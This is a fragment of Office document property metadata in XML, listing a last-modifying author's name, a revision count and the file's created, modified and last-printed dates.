  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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ie</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>YANJIE PENG</cp:lastModifiedBy>
  <cp:revision>2607</cp:revision>
  <cp:lastPrinted>2025-05-10T10:41:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-23T08:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-14T03:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>